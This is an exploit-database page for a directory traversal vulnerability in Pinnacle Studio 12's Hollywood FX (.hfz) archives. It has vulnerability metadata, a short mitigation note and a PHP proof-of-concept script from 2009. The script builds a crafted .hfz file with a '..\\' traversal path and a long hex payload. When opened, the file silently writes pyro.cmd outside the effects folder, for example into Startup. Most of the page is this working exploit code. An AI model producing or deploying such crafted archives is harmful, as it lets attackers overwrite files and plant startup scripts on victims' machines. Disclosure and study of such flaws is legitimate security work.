header-logo
Suggest Exploit
vendor:
Pinnacle Studio
by:
Nine:Situations:Group::pyrokinesis
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: Pinnacle Studio
Affected Version From: Pinnacle Studio 12
Affected Version To: Pinnacle Studio 12
Patch Exists: NO
Related CWE:
CPE: a:pinnacle_systems:pinnacle_studio:12
Metasploit:
Other Scripts:
Platforms Tested: Windows

Pinnacle Studio 12 “Hollywood FX Compressed Archive” (.hfz) directory traversal vulnerability poc

The .hfz files in Pinnacle Studio 12 can be used to overwrite files on the target system or place scripts in Startup folders by directory traversal attacks. The InstallHFX.exe decompresses them with no prompts.

Mitigation:

The vendor should validate and sanitize user input to prevent directory traversal attacks. Users should exercise caution when opening .hfz files from untrusted sources.
Source

Exploit-DB raw data:

<?php
    /*
    Pinnacle Studio 12 "Hollywood FX Compressed Archive" (.hfz) directory
    traversal vulnerability poc
    by Nine:Situations:Group::pyrokinesis
     
    Our site: http://retrogod.altervista.org/
    Software site: http://www.pinnaclesys.com/
     
    Some keys exported from the registry:
     
    [HKEY_CLASSES_ROOT\.hfz]
    @="hfzfile"
     
    [HKEY_CLASSES_ROOT\.hfz\hfzfile]
     
    [HKEY_CLASSES_ROOT\.hfz\hfzfile\ShellNew]
     
    [HKEY_CLASSES_ROOT\hfzfile]
    @="Hollywood FX Compressed Archive"
     
    [HKEY_CLASSES_ROOT\hfzfile\DefaultIcon]
    @="C:\\WINDOWS\\Installer\\{D041EB9E-890A-4098-8F94-51DA194AC72A}\\_A7BEE02B_CF3C_4710_85A0_92A3876E6F9C,0"
     
    [HKEY_CLASSES_ROOT\hfzfile\shell]
     
    [HKEY_CLASSES_ROOT\hfzfile\shell\Open]
     
    [HKEY_CLASSES_ROOT\hfzfile\shell\Open\command]
    @="\"C:\\Documents and Settings\\All Users.WINDOWS\\Documenti\\Pinnacle\\Content\\HollywoodFX\\InstallHFZ.exe\" \"%1\""
    "command"=hex(7):70,00,7e,00,46,00,78,00,6b,00,3f,00,49,00,63,00,69,00,38,00,\
    79,00,2b,00,37,00,32,00,6f,00,21,00,31,00,61,00,68,00,31,00,48,00,46,00,58,\
    00,3e,00,49,00,4d,00,53,00,27,00,73,00,50,00,7a,00,2e,00,6a,00,3d,00,34,00,\
    70,00,41,00,5b,00,4e,00,72,00,64,00,29,00,70,00,76,00,20,00,22,00,25,00,31,\
    00,22,00,00,00,00,00
     
    Usually files are decompressed in a Pinnacle effects folder...
    Problem is ... that .hfz files can be used to overwrite files on the target system
    or placing scripts in Startup folders by directory traversal attacks
    and InstallHFX.exe decompresses them with no prompts!
    Just modified an existing .hfz file and here it is the dump ...
    Also I experienced some crashes in doing this... investigating...
     
    */
     
    $____path = "..\\..\\..\\..\\..\\..\\..\\..\\pyro.cmd";
     
    $____payload = "\x48\x46\x58\x5a\x48\x46\x58\x5a\x9c\x07\x00\x00\x49\x00\x00\x00". "\x00\x21\x00\x00\x00\x7e". $____path. "\x65\x07\x00\x00\xa8\x1c\x00\x00\x8d\xc2\x71\x5a". "\x78\x9c\xbd\x59\x7b\x4c\x53\x57\x1c\xbe\x05\xf6\x10\x96\x6c\x0b". "\x33\xab\x2f\x5a\x2d\xe0\xe4\xdd\xd6\x84\xf2\x18\xbd\x2d\x6f\x04". "\x8a\xa5\x50\x44\x50\xcb\x1b\x05\x8a\x3c\xb4\x22\x8e\x25\x26\xcb". "\xd4\x64\xee\x8f\x2d\x9b\xcb\xe6\xd4\x2c\x21\xd3\x65\x6e\x59\xa2". "\x5b\x8c\x01\x97\xa8\x89\xc1\x05\xf7\xd7\xd8\x12\xcd\xc8\x12\x51". "\xf7\x62\xe0\x03\x5f\x77\xdf\xed\x69\x2f\xb7\xb7\xb7\xb7\xe5\xb2". "\xec\xe4\x77\x2e\xe7\x9e\x7b\xce\xef\x7c\xf7\xfb\x3d\xce\xb9\xa5". "\xa8\xa0\x26\xbf\x28\x3f\x4f\x97\x42\x51\x54\x24\xaa\xd9\x54\x99". "\x5c\xd1\xde\xad\x4e\xd3\xe3\x86\x3a\xd4\xd1\x9a\x13\x45\x7a\x93". "\x2a\x4a\x51\xad\x16\xb6\x5b\x41\x29\x5c\x54\x71\x59\xa1\x76\xf0". "\x15\x8a\x0a\x53\x84\x47\xa4\xa1\x33\x16\xd5\xfb\x37\x70\x79\xd3". "\xc8\xaf\x76\x3b\x13\x54\xaa\xab\x9f\x86\x32\xec\x3f\x97\x50\xd6". "\x4d\x4c\x1c\x0a\x2a\x09\x09\x6f\x48\x0f\x08\x65\xa1\xaa\xaa\x27". "\x16\xcb\x7d\xc8\x22\xf1\x00\x4c\x7a\xfa\x90\x46\xb3\x3b\x14\xe4". "\x44\x44\x17\x6a\x69\x61\x76\xee\x64\x6c\xb6\xc7\x10\x09\x3c\x4c". "\x5c\x9c\x3c\x79\x1a\x1b\xcb\xbf\x95\xc6\xd3\xdd\xcd\x6c\xde\xcc". "\x6c\xdc\x38\x07\x7e\x9c\x4e\xc6\x6a\x7d\x88\x76\x40\x3c\xa9\xa9". "\xf7\x56\xae\x0c\x02\x20\x21\xe1\xa1\x5a\x2d\x31\x60\xe2\xcc\x19". "\xbe\xf8\x2f\x04\x0c\xe0\x07\xd7\xca\xca\x47\x5b\xb7\x32\xa5\xa5". "\xb3\x25\x25\xff\x04\xe4\x67\xfd\xfa\x07\x31\x31\x8f\xd7\xac\x09". "\xb4\x1c\xc0\xb0\x78\xd2\xd3\xef\xaf\x5a\x25\x0f\x0f\x64\x60\x80". "\xb5\x17\x50\xa1\x8d\x6b\x4d\x0d\x53\x5b\x1b\x00\x0f\x4d\x33\x26". "\x93\xc0\x04\x44\xe6\x62\x63\x87\x95\x4a\xc8\x1d\x70\xa8\xd5\x4a". "\xf0\x33\x7b\xed\xda\x0f\xa7\x4e\x49\xe0\x81\xdb\x13\x4e\x60\x3e". "\xc2\x18\xb1\x1a\xdf\xc9\xe7\x75\xc6\xc7\xcf\xa9\x54\xb3\xcb\x97". "\x0b\x50\x4d\xb9\xcb\x65\x9b\x6b\x9a\xb0\x97\x98\xc8\xac\x5d\x8b". "\xc6\xa3\xd5\xab\xfd\xf9\xf9\xf1\xf4\x69\x09\x3c\x44\x0a\x0b\xff". "\x22\x60\x7a\x7a\x3c\x44\x01\xe7\x86\x0d\x33\xe4\x29\x56\xf7\x01". "\x60\x36\xb3\x0b\xe9\xf5\x5c\xe7\x6d\x77\x99\xd8\xba\x7f\x9a\xb3". "\xa6\xc1\xc0\x5e\x4d\x26\x51\x7b\x4d\x5d\xbc\x28\x8d\x07\x02\x4b". "\x11\x5a\x9a\x9b\x59\x3c\xad\xad\xec\x6d\x47\x87\x78\x7c\xb1\x48". "\x52\x53\xe1\xc0\x84\x01\x82\xe7\x6a\xcd\xc0\xb4\xc0\xbb\x32\x32". "\xf8\x2f\x12\x8a\xff\x08\xa4\xa8\xe8\x6f\xe0\x81\xc9\xca\xcb\xef". "\x21\x1b\x80\xb1\x80\xf1\x1e\x1f\xef\x01\x96\x99\x49\xf0\x7c\x91". "\xd7\x26\xc4\xc3\x49\x72\x32\xae\x93\x23\x23\x0b\xc5\x43\x04\x90". "\x20\x68\xec\xd8\xc1\x72\x25\x11\xc2\x0f\xd6\xac\x99\xd1\x68\x08". "\x9e\xc3\x7a\x3b\xf0\xf8\x3b\x3c\xd7\xf3\xf3\xd9\xb3\x80\x71\x65". "\x78\x78\xa1\x78\x88\xa5\x90\x04\x48\xdc\x91\xe0\x12\x8d\xe2\xdf". "\xba\x3e\x44\x58\x11\x3c\xfb\xd3\x6c\x1c\x3f\xa2\x61\x48\x60\x5c". "\x3f\x77\x4e\x06\x1e\x22\x34\x3d\x55\x5f\xcf\x20\xa0\xe0\xc3\xac". "\xce\xec\x6c\xc1\x8b\x03\x46\xd2\xd2\xd5\x04\xcf\x50\x8a\x15\x78". "\x66\x96\x2d\x93\x88\x77\x79\xf6\xe2\x0b\xd2\x91\x27\xc9\xa8\x54". "\x82\x64\x48\xf0\x70\x65\xdf\x6b\x65\x7f\xa8\x54\x4f\x34\x1a\x8c". "\x14\xc5\x83\x80\xad\xab\x63\x75\xba\x5c\x9e\xd4\x27\x0f\x12\x5f". "\xe7\xdd\x15\x2b\x18\xa3\x91\x6f\x3b\x0e\xcf\x50\x42\xb9\xc7\x5e". "\x08\xf3\x82\x02\x7f\x3c\x44\x1b\x49\x74\x48\xc2\xc8\x2d\xd8\xd0". "\x17\x89\x87\x64\x39\x6c\x1c\x10\x01\xa4\xb7\x12\xca\x89\xdb\x60". "\x00\x1a\xe4\xea\x8f\x67\xef\x5e\xa6\xa2\xe2\xc1\xf6\xed\x32\xc9". "\x09\x18\xef\x49\x49\xdc\xee\x79\x43\xad\xbe\x2c\xd8\x6d\xe3\xe3". "\x81\x07\xb6\xf3\xc7\x63\x77\x6f\x0a\x70\x4b\xd1\xb5\xf2\xf2\x7e". "\x97\x89\x87\x64\xe0\x94\x14\xa9\x7d\xdf\x68\x84\xcb\x71\xc0\x82". "\x2e\xb4\x6b\x17\x0b\x15\x3b\xbb\x1c\x3c\x71\x71\xac\x17\x91\xb8". "\x93\x90\xac\x2c\xce\xb2\xd2\xab\x20\xbd\x60\x77\x40\x86\x41\x1e". "\x16\x3d\xf9\x70\x27\xcc\x20\x2b\x86\x2c\x12\x60\xb0\x5b\xc1\xc3". "\xe1\xea\x84\x1c\x04\x20\x12\x20\x4e\x65\x12\x53\x2c\x96\x5b\x34". "\x7d\x2e\x3b\xfb\xeb\xf0\xf0\xe7\x15\x0a\xc5\xf8\xf8\x38\x17\x59". "\x4a\xa5\xb2\x25\xc1\x66\x30\x0c\xe7\xe5\x9d\xed\xef\x9f\x95\xed". "\xa8\x90\xe2\xe2\x69\x72\x50\x04\x1b\x88\x3e\x89\x00\x3c\x5a\xff". "\xd5\x65\xc7\xe1\x0f\x8a\x9d\x1f\x97\xb8\xb0\xb4\xc9\x74\xe1\xd2". "\xa5\x4b\x1c\xa4\x88\xb0\x70\xbb\xe9\xdd\xa2\xa2\xef\x2a\x2b\xef". "\x6d\xd9\xc2\x1e\xed\xf8\x0c\x87\xfe\xb5\x82\xd0\xc3\x60\xd8\x0e". "\x48\x36\x6d\x62\x7b\xba\xba\x44\x86\x61\x39\x7c\x36\x69\x34\x9a". "\xba\xba\xfa\x77\x68\x27\xf0\x64\x64\x7c\x8e\x1e\x0e\x0f\xda\xb5". "\xba\x01\x9a\xbe\x68\xb3\x3d\x82\x4e\x37\x9f\xf7\x17\xf3\xd1\x84". "\x97\xb2\xf3\x92\x15\xd9\x4f\x39\x99\x98\x98\x20\xeb\xe2\xdc\x65". "\x50\x26\xef\xd1\x37\x64\x19\x3e\x8b\x8a\x8a\xe2\xe3\xc9\x32\x9c". "\xac\xa8\xb8\xd3\xde\xce\x8e\x87\x1b\x00\x0c\xf4\x2c\x06\x12\x72". "\x14\xdc\x1b\x2c\x35\x34\x30\x4d\x4d\x9e\xc3\x06\x61\x9b\x4f\x85". "\xcb\xe5\x22\x5f\x99\xfc\xcd\xe2\x99\xb0\x88\x92\x92\x5f\x0a\x0a". "\xfe\xc4\x78\xf8\x21\x08\x07\x4b\x7d\x7d\x8c\xc3\xc1\x48\x7f\xbc". "\x04\x75\x72\xac\x0e\xdf\x6e\x6b\x63\x4d\x09\x23\x92\xd0\x4b\x4d". "\x3d\x74\x3b\x70\x01\xc2\xda\x9c\x63\x55\x55\x8f\x89\x12\x4c\x21". "\xd2\xd8\xc8\x12\x0e\x9d\x38\x4d\xc9\x66\x69\xdb\x36\x76\x5b\x81". "\x12\xe0\x21\xa9\x60\x70\x90\xed\x17\x10\xc2\x95\xc9\xc9\x49\xda". "\xf0\x49\x75\xb5\x30\x10\xb8\x2f\x17\x38\x52\x6f\xaf\xd4\xf7\x54". "\x50\x41\x74\xec\xde\xed\xc9\x4b\x50\x88\x36\x10\xe2\xd8\x1f\x1d". "\x9d\x0e\x2a\x38\x24\x37\x6f\xde\x8c\x8c\x8c\xb4\x5a\x67\x02\xe9". "\x01\x12\x58\x1f\xc1\x8b\xb7\x83\x06\xec\x5c\x65\x65\x77\x65\x13". "\x05\xc1\x7b\xd9\xdd\x99\x13\x0a\xe1\x51\xa4\x93\xa6\xcf\x47\x46". "\xc6\x28\x95\x85\x36\x5b\x90\x0f\x6d\xbb\x7b\x0b\x20\xfe\x83\x78". "\x21\x9c\xcb\x76\x27\xbb\x3b\x3b\xe1\x8a\xbd\x0f\x07\x57\x34\x48". "\x42\x58\x28\xed\xb0\x54\x67\x27\x1b\x14\x08\x3d\x72\xe0\x44\xbc". "\xc8\x86\x04\x72\x48\x03\x84\x93\x2c\x07\xce\x83\x6e\x79\xfe\x82". "\xb4\x06\xae\xc8\xdb\xe5\xe6\xde\xe1\x82\xd7\x5f\x42\x4c\x11\xe4". "\x68\x07\x6f\x87\xc8\xce\x2a\x5c\xc0\xf6\xf7\x33\x24\x53\xc9\x16". "\xd0\x02\x25\x7b\xf6\x2c\x4a\x89\xc9\x74\x0b\x2e\x84\x24\x40\x72". "\xf8\xe2\x45\xde\x09\x53\x20\x41\x7f\x71\xfa\xff\x85\x6f\x71\x4b". "\x85\x4d\x67\x45\x7a\x9b\x0a\x9f\xff\x75\x91\x2b\x0a\x4f\x25\x17". "\xae\xc1\xfe\xf0\x48\xb3\x8d\x70\xfe\x14\x3c\x8a\xe1\xcd\x3d\x92". "\x5f\x5e\xad\x9d\x43\x63\xfc\x39\xaf\x66\x93\x8a\xb4\xc2\xa9\x08". "\xd1\x5f\x36\x97\x84\xf4\xab\xe7\xd5\xb1\xd2\x1c\xe1\xbc\x0b\x63". "\xa5\xc6\xd6\x96\xf8\x11\x8a\x1a\x1d\xf1\x7d\x46\x1b\xbd\xf5\xea". "\xd8\x98\xcf\x3c\x05\x59\x6f\x54\xaf\xff\x06\x73\xe8\x51\xc1\x82". "\xc6\xf9\xea\xc3\x49\xe8\xf3\xbc\x04\x5c\xe3\x08\x30\x87\x42\x00". "\x1d\x4c\xf1\x47\x47\x96\x89\x01\x0a\x3a\x0f\xc4\x19\x7d\x1f\x2d". "\xa1\xd2\x22\xed\x23\x85\xbf\x66\x4a\x12\x27\x24\x20\x54\x43\x51". "\x65\xf9\x79\x5a\xd6\xb7\x8e\xbd\x38\xff\x88\xa2\x5e\x40\x2d\x72". "\xf6\xf6\xa9\xab\xdb\x9b\x9a\x9d\x6a\xbd\xf0\x3e\x82\xe2\x8f\x16". "\x96\x97\xd6\xe2\x72\xc4\xab\xf9\xb8\x94\x66\xad\xf0\x7e\x21\x9a". "\x4f\x48\x69\xd6\x09\xef\x43\xd1\x5c\x69\x2d\xd0\x9e\x44\xe3\xed". "\x68\xfe\x58\xf7\x7f\x0c\x1c\x8d\x3b\x9a\x7a\x9c\xdd\x6a\x3d\x45". "\x0d\x19\xe7\xab\xb8\x36\x91\xa2\xa0\xc2\x28\x12\x93\x34\xed\x3f". "\xcd\x4b\xbf\x58\xe1\x59\xab\xc9\x8b\x14\x25\xcc\x7d\x65\x11\x0f". "\xe3\xef\x01\x1f\xc4\xac\x37\x7b\x08\x15\x81\xcb\xd5\xf3\x5d\xd4". "\x20\xfa\xcc\x22\x60\xa5\xe1\x1e\x0f\x09\x2e\xfb\x3f\x95\x68\x4f". "\x65\xdb\x2f\xcf\xc3\x3d\x18\x00\xae\x4e\x16\xbb\xc1\xe0\x9e\x90". "\x0b\x37\xd7\x54\xa6\xeb\x45\xb3\xfb\x55\x3e\x5c\xf6\x61\x99\xa3". "\xbd\x4b\x9d\xeb\xe8\x6c\xee\x71\xf8\x68\xa3\x03\x69\xbf\xd2\x13". "\x6b\x46\x7a\x7b\x9d\xa2\xb6\x99\xac\xdf\x1e\xcd\xf1\x56\xf6\x99". "\xe2\xbd\xf7\xa3\x15\x0a\xde\x34\xd7\xf5\xf5\x16\x73\x89\xf6\x53". "\x34\x69\x15\x7f\xe9\x67\x29\xe2\x8a\x6a\xfd\x3a\xb4\xf6\x76\xf7". "\x38\x9b\xba\x1d\x7d\x6d\xfb\x32\x2d\x0d\xdb\x9b\x1b\xfb\x7a\x33". "\xd3\xd2\xd4\xc9\xea\x5c\x67\x67\xa7\xb3\x2b\x93\x0c\x4c\x69\x6b". "\x71\x0a\x40\x8d\x0a\x38\xa0\x79\x55\xbc\x28\xdc\x21\x21\xdc\x3e". "\x10\x84\x5e\x98\x26\x3f\x98\x05\x1d\x8e\x3e\xb5\x36\x04\x98\x64". "\xa0\x17\x66\x65\xd6\x8d\x9c\x75\x75\xc6\x91\xef\xef\xfe\xe4\x93". "\xed\x96\x7e\x99\x6e\xf4\x56\x0f\x24\x31\x98\x07\xa4\x61\x9a\xc5". "\x61\xea\x42\x85\xa9\xe3\xb1\x19\x34\x99\x4b\xc0\x3c\x28\x0e\xf3". "\x5f\x77\x19\xc2\x8e\x00\x00\x48\x46\x58\x5a\x28\x00\x00\x00\x44". "\x00\x00\x00\x00\x11\x00\x00\x00\x7e\x6f\x72\x67\x73\x3a\x65\x66". "\x66\x65\x63\x74\x73\x2e\x6f\x72\x67\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x34\x00\x00";
     
    $_f = fopen("puf.hfz", "w+");
     
    fputs($_f, $____payload);
     
    fclose($_f);
     
?>

# milw0rm.com [2009-05-13]

Navigation

Suggest Exploit

Services By CQR